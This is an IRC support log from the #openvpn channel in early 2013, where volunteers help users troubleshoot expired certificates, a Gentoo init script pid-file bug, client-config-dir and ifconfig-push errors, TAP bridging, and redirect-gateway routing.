19:44 < shadoom> yes 19:44 < cosmicgate> check your configuration on android 19:44 < cosmicgate> something might be amiss 19:51 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 19:56 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 20:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:12 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 20:12 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 20:12 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:12 -!- mode/#openvpn [+o krzee] by ChanServ 20:13 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 255 seconds] 20:15 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 20:16 -!- cosmicgate [~root@216.17.109.26] has quit [Ping timeout: 256 seconds] 20:22 -!- catsup [~d@64.111.123.163] has quit [Read error: Operation timed out] 20:22 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:27 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 20:28 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:30 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 20:30 < shadoom> does anyone else know why the android version of openvpn wouldnt work with my client.ovpn but windows7 and ubuntu does? 20:31 <@krzee> not without more info :D 20:31 <@krzee> tried looking at the logs? 
20:31 < shadoom> yeah i dont see any warning on it 20:32 < shadoom> its connected successfully 20:32 < shadoom> but theres no internet access whatsoever 20:33 <@krzee> !logs 20:33 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 20:33 < shadoom> when im connected to the vpn on my android device the only website i can access is the access-server 20:34 < shadoom> well the log is on my phone, let me see if i can copy it out somehow 20:34 -!- cosmicgate [~root@113.210.100.175] has joined #openvpn 20:35 <@krzee> access-server you say? 20:35 <@krzee> !as 20:35 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 20:35 -!- cosmicgate is now known as Guest36577 20:35 < shadoom> well but i use a .ovpn file to connect and the official openvpn app for android? 20:35 <@krzee> go ahead and try to get the log still, im sure #openvpn-as will need it 20:35 < shadoom> okay 20:35 <@krzee> i dunno, you need #openvpn-as 20:35 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 20:35 <@krzee> ive never used AS 20:38 -!- Guest36577 [~root@113.210.100.175] has left #openvpn [] 20:38 -!- cosmicgate [~root@113.210.100.175] has joined #openvpn 20:50 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has quit [Quit: leaving] 20:59 -!- adolfomaltez [~taro@190.62.238.211] has joined #openvpn 21:01 -!- pfire2 [~mthode@62.205.111.11] has joined #openvpn 21:02 < pfire2> is there a way to ignore certificate expiration client side? Feb 1 04:02:06 khorne openvpn[30172]: SIGUSR1[soft,tls-error] received, process restarting 21:03 <+pekster> Chnage your clock? Why can't you just re-issue the server certificate? 
21:03 * pfire2 is away from home and server cert expired... 21:03 < pfire2> client cert is still good though 21:04 <+pekster> If your PKI is online (or split where part of it that issues frontend certs is online) you can ssh in and re-issue 21:04 <+pekster> I don't suppose that's set up? 21:05 < pfire2> no, ssh only over vpn 21:05 < pfire2> I'm looking at my firewall config to see if I left an in for me though 21:05 < pfire2> well, I might have 21:06 < pfire2> no, not that one :( 21:06 <+pekster> Or just temporarily open it up. I generally don't mind public ssh, although I change the default port and limit acceptable auth types to pubkey only 21:06 <+pekster> I rarely get scans or login attempts using obscure numbers 21:06 <+pekster> Next time mark your calendar for cert expirations ;) 21:07 < pfire2> I'm 7000km away from that system 21:07 < pfire2> ya 21:08 <+pekster> If ssh works over VPN, you can set your local clock backwards to when the cert was still valid, connect in, re-issue the cert, and log out and fix your clock 21:08 <+pekster> Kind of a hack, but it'll work (it wouldn't work with an expired client cert, but that's not (yet) your problem) 21:08 < pfire2> I can try that 21:09 <+pekster> openvpn can do "extra" checks on a certificate, but they first have to pass the existing checks. openvpn relies on OpenSSL to do the verification of certs, so there's no flag to turn it off 21:10 < pfire2> ok 21:11 < pfire2> that did the trick, thanks 21:11 < pfire2> the date thing 21:14 <+pekster> Best check your client expiration too, otherwise you won't be so lucky next time 21:16 < pfire2> ya, working on that too 21:16 < pfire2> I only have a couple of days til it expires 21:19 < cosmicgate> sounds like you're living on borrowed time 21:20 < pfire2> very much so 21:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 
21:24 <+pekster> Best to check such things before you go far away from physical access to stuff you care about. And maybe issue things for longer. If you're comfortable revoking lost/unused/compromised keys yourself, just issue them for 100 years or something and never run into that again 21:25 < pfire2> ya 21:25 < pfire2> ya, up'd to 10 years and replaced certs 21:25 < pfire2> all done :D 21:29 <+pekster> Don't forget to bounce services at both ends 21:29 <+pekster> And be sure you set permissions and file names properly, otherwise a restart will fail. That, or set up remote ssh access first as your dead-man's switch 21:30 <+pekster> And, maybe consider opening externall ssh after you properly harden/secure it (alt pot + pubkey only, no passwords.) 21:31 < pfire2> yep 21:31 < pfire2> ssh was done first 21:38 < cosmicgate> anyone know how to use the client-nat directive of openvpn 2.3? 21:38 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 21:46 -!- prometheanfire [~promethea@gentoo/developer/prometheanfire] has joined #openvpn 21:46 < prometheanfire> thanks for the help pekster :D 21:48 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 21:49 -!- pfire2 [~mthode@62.205.111.11] has quit [Quit: leaving] 22:00 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 22:11 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [] 22:17 -!- _quadDam1ge [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 22:19 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has quit [Read error: Connection reset by peer] 22:23 <+pekster> prometheanfire: np. 
I noticed the cloak on that account too; I've been a Gentoo fan for a while, and have it running on 2 headless boxes downstairs atm :) 22:52 -!- voyo [~voyo@213-134-188-198.home.aster.pl] has quit [Read error: Connection reset by peer] 23:03 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn 23:03 < phantomcircuit> !goal 23:03 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 23:04 < phantomcircuit> i have a server running 2.2.2 on gentoo which has 1 client successfully connected and working, i have another client on gentoo running 2.2.2 that doesn't even try to connect it just fails before it sends out a single udp packet 23:04 < phantomcircuit> Feb 1 04:57:46 localhost openvpn[27199]: Local Options hash (VER=V4): '41690919' 23:04 < phantomcircuit> Feb 1 04:57:46 localhost openvpn[27199]: Expected Remote Options hash (VER=V4): '530fdded' 23:04 < phantomcircuit> Feb 1 04:57:46 localhost openvpn[27199]: Exiting 23:04 -!- ura [~ura@unaffiliated/ura] has joined #openvpn 23:04 < ura> Good morning! 23:05 < phantomcircuit> there's a warning about the semantics of tls-remote and about script-security but nothing else 23:07 < ura> Does OpenVPN have built-in DHCP server? My tap interface on client side configured with IP from ifconfig-pool, but other machine, whose interface is bridget with tap0 is sending DHCP requests but getting no answers. 23:07 <+pekster> Try posting the logs, not snippits of them phantomcircuit. It's hard to know what the problem is when we're missing critical pieces 23:07 <+pekster> phantomcircuit: Also, using verb 4 will help identify issues. 3 or less leaves out potentially helpful info 23:07 < ura> So I tend to think what is often called "OpenVPN DHCP" is just an internal protocol for assigning IP to clients, but not real DHCP. 
23:08 <+pekster> ura: OpenVPN client side uses a fake DHCP server to supporg eg: Windows DHCP 23:09 < ura> pekster, Thanks I will read this configuration. I must misconfigured, because my DHCP requests are not handled by openvpen and are going through tap interface to server. 23:09 < phantomcircuit> pekster, ok 23:09 < phantomcircuit> http://pastebin.com/raw.php?i=Na4vNJXZ 23:09 < phantomcircuit> verb = 11 23:09 <+pekster> Well, >5 is debugging only levels 23:09 <+pekster> Stick with 4, or maybe 5 if you really need per-packet RWrw in your logs 23:09 < phantomcircuit> it's still a short log even with verb=11 23:10 <+pekster> Yea, this is fine 23:10 <+pekster> Just for next time ;) 23:11 < phantomcircuit> yeah i set it higher after i noticed there wasn't any packet activity 23:11 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 23:12 < phantomcircuit> you know what i think it's being killed by the gentoo init script :| 23:13 < ura> pekster, But if I have Linux server and Linux client, and Windows machine bridged to tap0 can I use DHCP for windows machine? Would ip-win32 work in this case? 23:13 < phantomcircuit> openvpn openvpn.conf is working just fine :| 23:13 <+pekster> I use ovpn, currently 2.3.0, but I used to run 2.2.2 under Gentoo and it worked fine. Maybe it's the way something interacts with it? 23:13 <+pekster> phantomcircuit: Nvm, just gunna say to test that 23:13 <+pekster> phantomcircuit: See /etc/conf.d/openvpn for some init runtime config. Gentoo makes a mistake (IMO) by downgrading user privs itself unless you tell it not to 23:14 < phantomcircuit> PEER_DNS/DETECT_CLIENT/RE_ENTER 23:14 <+pekster> ura: If you use --ifconfig-pool, openvpn will get an IP out of that. 
If you want to use a LAN DHCP server instead, don't pass a pool and the DHCP requet hits your LAN server-side lstead 23:14 < phantomcircuit> nothing about user privs 23:14 < phantomcircuit> http://pastebin.com/raw.php?i=jNKk0yDa 23:15 <+pekster> Set DETECT_CLIENT="no", as that'll stop the user priv downgrade, IIRC 23:15 <+pekster> Oh, wait, no 23:15 <+pekster> Sorry, set 'user root' and 'group root' in yoru config 23:15 <+pekster> Or hack the initscript to suck less 23:15 <+pekster> I also have DETECT_CLIENT="no" for sanity 23:16 < ura> pekster, I see, so the only option to use DHCP on bridged Windows machine is to setup DHCP at server. I hoped that OpenVPN has built-in DHCP server which works as supplement to ifconfig-pool to aid setting ip on bridged machines. 23:16 <+pekster> Otherwise it does all sorts of silly stuff by calling its own up/down scripts; maybe you like that automatic behaviour, but I don't. Unless you wanted gentoo's init to downgrade privs to the 'openvpn' user, set the user/group to root in your ovpn config, or comment out those lines in the init 23:17 < phantomcircuit> pekster, it's an selinux install so i suspect lots of things will break horribly without the right users 23:17 < phantomcircuit> but i'll give it a shot 23:17 <+pekster> ura: No, the only "dhcp" stuff openvpn does is fake it to the client if the sever pushed an ip via --ifconfig-pool or --ifconfig-push 23:18 <+pekster> phantomcircuit: Yea, I'd imaine so. Try letting openvpn run as root, unless you've configured SELinux to let it work with 'openvpn' 23:18 <+pekster> An SELinux related channel is probably better for support since openvpn can't run without the right OS-level permissions, obviously 23:18 <+pekster> Or put SELinux into permissive mode and see what gets tripped to fix 23:19 <+pekster> I assume you have sec-policy/selinux-openvpn already? 23:19 < ura> pekster, I see. Thank you very much for explanation! 23:21 < phantomcircuit> root 2256 2255 0 05:21 ? 
00:00:00 /usr/sbin/openvpn --config /etc/openvpn/openvpn.conf --writepid /var/run/openvpn.pid --daemon --setenv SVCNAME openvpn --cd /etc/openvpn --setenv PEER_DNS no 23:21 < phantomcircuit> exactly the same log output 23:22 <+pekster> What's SELinux log show? 23:22 <+pekster> I'm guessing denials 23:23 <+pekster> Again: put SELinux into permissive mode, which is the standard way to see what permissions an app is tripping that you must fix 23:23 <+pekster> I'm not very familiar with SELinux beyond high level understanding, so I won't be of specific help 23:23 < phantomcircuit> absolutely nothing :/ 23:23 < phantomcircuit> first thing i checked for 23:24 <+pekster> You can past your config and I can see if anything looks off there 23:24 < phantomcircuit> permissive/enforcing you get the same errors the only difference is they're enforced 23:24 <+pekster> But you should get an actual error message at some point 23:24 <+pekster> (in openvpn, that is; it's really good about explaining why it didn't do something prior to initilization) 23:24 < phantomcircuit> http://pastebin.com/raw.php?i=wm72QDpz 23:26 < phantomcircuit> pretty standard configuration 23:27 <+pekster> Yea. huh, no idea really 23:29 < phantomcircuit> it is bizarre isn't it :) 23:29 < phantomcircuit> i'll go bug someone in #gentoo 23:29 < phantomcircuit> it's clearly an init.d bug 23:30 <+pekster> phantomcircuit: I don't suppose if you set DETECT_CLIENT=no that helps? 23:31 <+pekster> That turns off some adjustment of options, like changing script-security to 2, and adding their own --up and --down options 23:31 < phantomcircuit> no it didn't i set that and then commented out the server part of the init script 23:31 <+pekster> I guess either way it may be a bug against the initscript when used in combination with SELinux 23:32 <+pekster> The "server part" of the initscript? 23:32 <+pekster> The client dtect stuff right after "if [ "${DETECT_CLIENT:-yes}" = "yes" ] && \ ..." 
is the part that's causing "client-looking config" to get extra commands added when you start it 23:32 < phantomcircuit> DETECT_CLIENT is an if/else that assumes if you have DETECT_CLIENT=no you're a server and should be running as openvpn 23:33 <+pekster> Yea; I disabsle both by setting DETECT_CLIENT=no and 'user root' 'group root' so that effectively does "nothing" 23:33 <+pekster> YMMV 23:36 < phantomcircuit> openvpn --up-delay --up-restart --cd /etc/openvpn/ --script-security 2 --up /etc/openvpn/up.sh --down-pre --down /etc/openvpn/down.sh --config /etc/openvpn/openvpn.conf 23:36 < phantomcircuit> which i think is all of the gentoo options works 23:36 -!- cosmicgate [~root@113.210.100.175] has quit [] 23:37 < phantomcircuit> so it's something about start-stop-daemon 23:37 -!- cosmicgate [~root@113.210.100.175] has joined #openvpn 23:37 <+pekster> huh, interesting 23:37 < phantomcircuit> the order of cmd line argument doesn't matter.. does it? 23:37 -!- cosmicgate is now known as Guest93345 23:37 <+pekster> Oh, it does becuase options after --config foo.conf over-write those, IIRC 23:38 <+pekster> So, can you repeate that CLI test with --config at the beginning? 23:38 < phantomcircuit> ahah 23:38 <+pekster> That'll probably reveal breakge, I hope 23:39 < phantomcircuit> i reordered them to match and now i get the same result as init 23:39 <+pekster> So, now you know it's one of the gentoo-specific init flags that's breaking it 23:39 <+pekster> Figure out which one and remove/fix it ;) 23:39 <+pekster> Then send it upstream, because that's a really nasty bug 23:40 < phantomcircuit> there's no /var/run directory 23:40 -!- catsup [d@64.111.123.163] has joined #openvpn 23:40 < phantomcircuit> gentoo moved to /run 23:40 < phantomcircuit> lol 23:40 <+pekster> You're kidding, *that* broke it? 
:x 23:40 < phantomcircuit> --writepid /var/run/openvpn.pid is what's breaking it 23:40 <+pekster> Probably file the bug against SELinux, not openvpn then 23:40 <+pekster> Their team needs to fix the openvpn SELinux packag 23:40 < phantomcircuit> that was it 23:41 < phantomcircuit> it's a gentoo bug in general the init script should be using /run not /var/run 23:41 < phantomcircuit> i'll file it with gentoo against the portage package 23:41 <+pekster> Well, /var/run is a symlink to /run, no? 23:41 < phantomcircuit> it's probably also an openvpn bug that there's no error though 23:42 <+pekster> No, because start-stop-daemon is the one creating the PID 23:42 < phantomcircuit> normally it would be but somehow it got disappeared on this system 23:42 < phantomcircuit> no actually this init script has both start-stop-daemon and openvpn creating a pid file 23:42 <+pekster> Oh, yea, missed that 23:43 <+pekster> You could just put the symlink back 23:43 < phantomcircuit> so this appears to be both an openvpn bug and a gentoo portage bug 23:43 <+pekster> No clue why that's not there. I have a recent-ish install (maybe 6mo old) and it's there 23:43 < phantomcircuit> the openvpn bug being that there's mysteriously no error 23:44 <+pekster> I wonder if that's an SELinux thing, or not though. Let me try to test real quick. So you had openvpn [whatever] --writepid /var/does-not-exist/openvpn.blah.pid, right? 23:45 < phantomcircuit> yeah 23:45 <+pekster> 2.2.2? 
(I'll need to build that real quick into /usr/local if you're not on 2.3.0) 23:45 < phantomcircuit> yeah 23:46 < phantomcircuit> im fairly certain it isn't an selinux bug 23:46 <+pekster> k, gimmie a few to rebuild, and I'll see if I can reproduce here (if you'd like that info for the bugreport at least) 23:46 < phantomcircuit> all selinux denials are logged to the kernel message buffer 23:46 < phantomcircuit> and there wasn't anything logged 23:46 <+pekster> Sure, that makes sense 23:51 <+pekster> So, while 2.2.2 builds, 2.3.0 does the proper thing for me: Options error: --writepid fails with '/var/nowhere/openvpn.remote.pid': No such file or directory 23:51 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn 23:52 <+pekster> Same with 2.2.2 as well 23:52 <+pekster> Open error on pid file /var/nowhere/openvpn.remote.pid: No such file or directory (errno=2) 23:52 < phantomcircuit> msg (M_ERR, "Open error on pid file %s", filename); 23:53 < phantomcircuit> does that look right for an error line? 23:53 <+pekster> FWIW, I'm running 32-bit, with the following build opts: ./configure --prefix=/usr/local/apps/openvpn-2.2.2 --enable-password-save --enable-iproute2 23:53 <+pekster> Yea, msg() then fatally exists with an error flag passed, in this case M_ERR 23:54 <+pekster> Oh, no, but there should be code below that to exit, I think 23:54 <+pekster> Still, no clue why it doesn't get loged :\ 23:57 < phantomcircuit> and actually it doesn't even look like it should be a fatal error 23:57 < phantomcircuit> it appears to be designed to log the error and carry on 23:58 <+pekster> Well, it definitly cuased it to fatally exit for me 23:58 <+pekster> Notice in error.c it does a binary AND with M_FATAL, so maybe error.h has bitmasks for that? 
--- Day changed Fri Feb 01 2013 00:00 -!- grey__ [~grey@cpe-76-171-192-216.socal.res.rr.com] has joined #openvpn 00:01 < phantomcircuit> error.h is one giant hack around broken compilers :| 00:01 < phantomcircuit> while (false) 00:01 < phantomcircuit> heh 00:02 <+pekster> #define M_ERR (M_FATAL | M_ERRNO) 00:02 <+pekster> So M_ERR implies M_FATAL 00:02 <+pekster> Which causes msg() to eventually exit 00:02 <+pekster> So, it "should" print that message for you, and "should" exit 00:02 <+pekster> And my 2.2.2 build does 00:03 -!- greyEAX [~grey@cpe-76-171-192-216.socal.res.rr.com] has quit [Ping timeout: 244 seconds] 00:03 <+pekster> I'm not saying yours doesn't do differently, but I'm not sure why exactly 00:04 <+pekster> Code says that's not supposed to happen ;) 00:04 < phantomcircuit> heh 00:22 -!- adolfomaltez [~taro@190.62.238.211] has quit [Ping timeout: 248 seconds] 00:29 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit [] 00:29 -!- SpookZA [~SpookZA@dsl-146-42-248.telkomadsl.co.za] has quit [Ping timeout: 276 seconds] 00:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 00:39 -!- adolfomaltez [~taro@190.62.211.253] has joined #openvpn 00:44 -!- cosmicgate-- [~root@198.148.120.32] has joined #openvpn 00:46 -!- Guest93345 [~root@113.210.100.175] has quit [Ping timeout: 252 seconds] 00:50 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 00:51 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 01:08 < prometheanfire> pekster: :D 01:08 < prometheanfire> pekster: noticed some selinux questions, if you have any let me know :D 01:09 < phantomcircuit> prometheanfire, there's some weirdness with an error message disappearing 01:10 < phantomcircuit> dont think it's selinux related though 01:11 <+pekster> Yea, that's the weird part. You get other logs, so clearly the log write is allowed. 
But I get the all-important message you don't, somehow 01:11 <+pekster> But it exitsi as if it was passed through that msg() function :\ 01:11 <+pekster> exit is* 01:41 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 01:45 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 255 seconds] 01:55 -!- manitu [~Thunderbi@h-213.61.163.68.host.de.colt.net] has joined #openvpn 01:56 < manitu> !welcome 01:56 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 01:56 < manitu> !goal 01:56 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 01:56 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 01:58 < manitu> 'I would like to run openvpn in a failover cluster'.. is there any implementation for this or do i just bind openvpn to my failover ip and start it on both servers? 02:02 < manitu> second question: someone here wrote a program to control access and that stuff, what was the name of this? 02:08 < manitu> yet another problem: if i change a ccd-file i need to reload or it won't be detected.. but if i reload all my clients disconnect.. is there no "softer" way? 
02:12 < cosmicgate--> no need to reload 02:12 < cosmicgate--> for fail-over, just start openvpn on a new daemon 02:15 < manitu> cosmicgate--: the strange thing is i tried to create a new certificate, created a ccd and let the client connect after, but the ccd config didn't work at all :/ 02:16 < cosmicgate--> show me the contents of the ccd file 02:17 < manitu> cosmicgate--: uh.. don't know right now, happened some time ago, but they looks basically like: 02:17 < manitu> !paste 02:17 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 02:18 < manitu> http://pastebin.com/Uay4tbhz 02:18 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 276 seconds] 02:18 < manitu> i don't know if the last push is required, but the one before me did this, so i also do it :o 02:19 <+pekster> manitu: That push should go in the main config file, not the ccd file, if and only if you want *other* clients to access that host owned by that client (the one the ccd is named after) 02:19 <+pekster> Well, either way you need to make the server aware of it via a 'route' command on the server-side 02:20 <+pekster> The manpage desscribes this behaviour in the --iroute option pretty well 02:21 < manitu> pekster: since not ever vpn-user should know every other it is not in the main.. the users certs have /24 routes in it.. don't worry about that it wouldn't be routed.. and i know you manually could add the route :) 02:21 <+pekster> No, my point is pushing a route (the /32 host-route) in the ccd that matches an iroute is a mistake 02:22 <+pekster> Don't do that. Then go read --iroute in the manpage to learn why, and what you need to do to make that iroute statement actually work 02:22 < manitu> pekster: i thought so.. but it seems to work.. 
i didn't write that down, just didn't remove it :/
02:23 < cosmicgate--> manitu: ifconfig-push is in the wrong format
02:23 < cosmicgate--> are you using tun or tap?
02:23 < manitu> cosmicgate--: on the server side it's tun
02:23 <+pekster> Oh, yea, good catch. Even in PtP those need to be unique
02:23 < manitu> the client side is for the "computer clients" tun too
02:24 <+pekster> You should post your server config too, because many things are not correct in that ccd file
02:24 < manitu> pekster: what should be unique in which way?
02:24 <+pekster> see --ifconfig-push in the manpage
02:24 <+pekster> That is bogus because the IPs are the same
02:24 <+pekster> So, basically your entire ccd file is full of errors
02:27 < manitu> pekster: the second parameter is a netmask? like 255.255.255.255?.. is it still PtP?
02:27 < cosmicgate--> manitu: change your ifconfig-push to ifconfig-push 172.16.3.69 172.16.3.70 for windows
02:27 < cosmicgate--> if it's linux then it should be 172.16.3.69 255.255.255.0
02:28 < manitu> cosmicgate--: ah.. so it's the gateway.. is there no way just to use one ip per client?
02:28 <+pekster> Well, depends on the topology really
02:28 < cosmicgate--> yup
02:28 <+pekster> manitu: There is. --topology subnet
02:28 < cosmicgate--> just set topology subnet
02:28 < manitu> cosmicgate--: windows on serverside or client side?
02:28 < cosmicgate--> manitu: server side, ccd
02:31 < manitu> cosmicgate--: changed one of my client ccds to netmask 255.255.255.0 and push "topology p2p", seems to work fine
02:33 < cosmicgate--> ok
02:33 <+pekster> Well, that's also not really what you intended, but it "works" because the PtP on the client is peering with the "IP" 255.255.255.0
02:34 < manitu> thank you already..
here is the server config http://pastebin.com/T1aPbYsu
02:34 <+pekster> Good timing; I was about to leave (it's late here) and not having a server config didn't motivate me to help
02:35 < manitu> pekster: i'm sorry for taking your time.. i didn't even write the configs :/ .. thank you for checking it
02:35 <+pekster> You really don't want a /16 for openvpn. It doesn't hurt, but you can't actually connect that many clients anyway. I'd switch to a /24, but that's your call
02:36 <+pekster> The push on line 21 is unnecessary: the --server directive already pushes the entire /16, so you don't need it (and if you reduce it to a /24, say 172.16.2.0/24, that'll be implicit anyway)
02:36 < manitu> pekster: route just routes internal, right? .. the thing is that we have some categories of clients and every one gets a /24 in the 192.168 section.. in the client ccd there is written something like 'push "route 192.168.10.0 255.255.255.0"'
02:37 <+pekster> Don't push a route like that
02:37 <+pekster> Line 18 in your server config already pushes the supernet to clients
02:37 <+pekster> Just define an iroute for whatever network is "behind" each one
02:37 <+pekster> No 'push "route"' junk in the ccd files
02:38 < manitu> pekster: is there some way of access management then? ..
some clients should stay in their /24 network and some have access to every client
02:38 <+pekster> So, 1) delete line 21 in the server config you pasted (it's worthless) 2) remove the unnecessary 'push "route"' statements that overlap with the route on line 18
02:39 <+pekster> 3) set 'topology subnet' in the server config (this sounds like what you want, and it includes a --push "topology subnet" since you're using --server too)
02:39 < manitu> pekster: the 192.168.0.0/16 is not shared to the clients as i see on my connected computer
02:40 <+pekster> 4) make sure every client ccd file is formatted like this: ifconfig-push 172.16.a.b 255.255.0.0 (match that subnet to the one in your --server directive)
02:40 <+pekster> manitu: Oh, I see. Yea, you don't have a push for that, sorry. So are all clients supposed to be inter-connected? Then just push that too
02:40 <+pekster> In the main server config
02:40 <+pekster> push "route 192.168.0.0 255.255.0.0"
02:40 <+pekster> Also, that'll eat up the common 192.168.0.0/24 and 192.168.1.0/24 networks, which could cause you site issues. Adjust accordingly
02:40 < manitu> pekster: that's why there are pushes in the ccd.. to just share one of the subnets or sometimes just one single client
02:41 <+pekster> Um, I guess you can do that. Seems a pain to manage and not clean in the least
02:41 <+pekster> But this is wrong: http://pastebin.com/Uay4tbhz
02:41 <+pekster> Don't ever push the route to something you define in an iroute
02:41 <+pekster> See --iroute why
02:42 < manitu> pekster: thought so already.. removed that push :)
02:42 < manitu> that config is the one for clients which should just access 172.16.a.b
02:43 <+pekster> And apparently also "owns" 192.168.0.73/32 ?
02:43 < manitu> it's a gprs "device" which has an internal lan
02:44 <+pekster> (remember, you can't re-use that IP, including in a larger netmask.
So if you did 'iroute 192.168.0.0 255.255.255.0' in another ccd, that will cause problems)
02:44 < manitu> and one client with 192.168.0.73.. that's why there is an iroute
02:44 <+pekster> You need unique network addressing everywhere you route to
02:44 <+pekster> Yea, this is fine as long as you support it routing-wise across your infrastructure. It's a little weird to do it for a /32 like that, but allowed
02:44 < manitu> the problem is that every gprs client has a single device so 192.168.0.73 255.255.255.255
02:45 < manitu> and that device sadly doesn't support any nat stuff
02:46 < manitu> and we won't do iroute with more than /24 .. they are managed in a database for that :)
02:47 < manitu> pekster: i'm a bit scared taking the server changes on a productive server right now.. need to test more :D
02:47 <+pekster> I'd suggest you do testing, yes
02:48 <+pekster> Maybe also look at --client-connect if things are in a backend table/database since it may be cleaner to key off of that than manually-managed ccd files
02:48 <+pekster> Anyway, I need some sleep. The suggestions I posted above with numbers are a good place to start, and see the manpage for all the options I just gave you
02:49 < manitu> thank you very much and sleep well :)
02:49 < manitu> here it's nearly 10am..
so the day is just starting :D
02:50 <+pekster> Fri Feb 1 02:50:01 CST 2013
02:50 <+pekster> :)
05:22 < Eagleman> I start my openvpn client with: remote example.com 1195 However when i run netstat -plnu | grep 119, i get this: udp 0 0 0.0.0.0:1194 0.0.0.0:* 14411/openvpn Any idea why this happens?
05:41 < Dashers> Morning - so, anybody got TAP working on a Linux server? I've got mine connecting up, getting an address from a standalone DHCP server etc. But, I cannot ping from the server to the client (although I can ping client to server, go figure). Any ideas?
05:42 < havoc> client firewall is blocking it
05:43 < havoc> check inbound rule(s) on your client
05:43 < Dashers> no firewalls :/
05:43 < Dashers> actually, forget the client being able to ping, I don't think it is.
05:43 < Dashers> Looking at tcpdump the ping is coming over the public network not the vpn device
05:43 < havoc> bad/missing route then
05:44 < Dashers> route? it's a TAP ethernet bridge
05:44 < havoc> yet another piece of info you neglected to mention ;)
05:45 < Dashers> " anybody got TAP working"
05:45 < havoc> check your routes, the route for that subnet should be using the bridge device
05:45 < havoc> ...on both ends
05:46 < Dashers> um, there is no subnet? it's an ethernet bridge
05:46 < havoc> if there is a network, there is a subnet
05:46 < havoc> i.e. local IP/MASK
05:46 < Dashers> Yeah, but everything is on the same subnet.
So nothing contacts the gateway as it's all internal to the local subnet
05:46 < Dashers> So, there is no routing performed
05:46 < Dashers> so no routes
05:47 < havoc> there is *ALWAYS* routing
05:47 < Dashers> Not layer 3
05:47 < havoc> every machine has a local routing table
05:47 < havoc> and this is layer 2, not 3
05:47 < havoc> you said TAP, and layer 3 cannot be bridged
05:47 < Dashers> indeed so the local routing table doesn't need to be adjusted
05:47 < Dashers> as the local routing tables operate at layer 3
05:49 < Dashers> Should the server tap0 device have its own IP address?
05:49 < Dashers> As the br0 device has a single address
05:49 < Dashers> which bridges tap0 and eth0
06:08 < Eagleman> I start my openvpn client with: remote example.com 1195 However when i run netstat -plnu | grep 119, i get this: udp 0 0 0.0.0.0:1194 0.0.0.0:* 14411/openvpn Any idea why this happens?
06:09 < Eagleman> server and client are both configured to listen and connect to port 1195
06:12 < julius_> hi
06:13 < julius_> i've added push "redirect-gateway" to my openvpn client config, but route says that destination 0.0.0.0 still goes over my lan interface eth0
06:13 < julius_> shouldn't it say that 0.0.0.0 goes over tun1 now?
06:14 < Eagleman> there should be two 0.0.0.0 routes
06:18 < julius_> ah, it's needed on the server side
06:21 < julius_> i only see one 0.0.0.0 entry now
06:21 < julius_> but that goes over tun0
06:25 < julius_> now even the dns traffic goes over the openvpn right?
06:33 < Dashers> yup
06:33 < Dashers> unless you have any explicit routes redirecting it
06:34 < julius_> the openvpn server at the other end is behind a router, do i need to make the openvpn server itself capable for routing?
06:35 < julius_> i mean with commands like: sysctl -w net.ipv4.ip_forward=1
06:35 < julius_> iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
06:35 < Dashers> yeah, you need to enable ip forwarding as the server is now a router between two networks
06:35 < Dashers> You'll also need to ensure that devices on the remote network know how to get to your vpn subnet
06:36 < julius_> only forwarding, no masquerading needed?
